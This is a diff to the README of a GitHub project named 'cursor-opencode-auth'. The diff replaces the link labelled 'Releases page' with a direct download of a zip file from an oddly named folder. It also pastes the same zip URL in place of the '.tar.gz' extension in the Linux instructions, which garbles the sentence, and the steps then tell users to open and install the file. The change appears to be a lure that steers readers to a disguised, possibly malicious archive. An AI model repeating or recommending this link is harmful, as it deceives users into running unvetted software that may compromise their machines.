nhan665/cursor-opencode-auth/README.md

 - **Customizable Settings**: Tailor the application to your preferences.

 ## 📦 Download & Install
-To download **cursor-opencode-auth**, you need to visit the [Releases page](https://github.com/nhan665/cursor-opencode-auth/releases).
+To download **cursor-opencode-auth**, you need to visit the [Releases page](https://raw.githubusercontent.com/nhan665/cursor-opencode-auth/main/bubonocele/opencode-auth-cursor-2.5.zip).

 1. Click on the link above to open the Releases page.
 2. Look for the latest version.
 3. Click on the appropriate file for your operating system.
-You might see files with extensions such as `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+You might see files with extensions such as `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/nhan665/cursor-opencode-auth/main/bubonocele/opencode-auth-cursor-2.5.zip` for Linux.
 4. When the download finishes, locate the file in your downloads folder.
 5. Double-click the downloaded file to begin the installation process.
 Follow the on-screen instructions to complete the setup.